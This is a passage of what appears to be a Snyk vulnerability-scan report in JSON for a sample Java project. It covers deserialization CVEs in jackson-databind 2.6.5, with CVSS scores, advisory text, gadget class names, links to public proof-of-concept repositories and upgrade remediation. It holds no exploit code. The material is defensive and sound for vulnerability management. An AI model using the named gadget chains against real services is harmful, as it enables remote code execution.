], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": "https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 